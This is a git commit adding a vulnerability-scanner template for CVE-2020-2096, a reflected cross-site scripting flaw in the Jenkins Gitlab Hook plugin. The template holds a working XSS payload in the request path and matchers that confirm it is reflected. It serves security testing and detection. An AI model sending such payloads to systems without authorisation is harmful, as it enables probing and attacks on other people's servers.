Create CVE-2020-2096.yaml

patch-1
SaN ThosH 2020-04-08 16:29:57 +05:30 committed by GitHub
parent afc0c707e3
commit 5eda31240e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 19 additions and 0 deletions

19
cves/CVE-2020-2096.yaml Normal file
View File

@ -0,0 +1,19 @@
id: CVE-2020-2096
info:
name: Jenkins Gitlab Hook XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/gitlab/build_now%3Csvg/onload=alert(1337)%3E"
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "1337"
part: body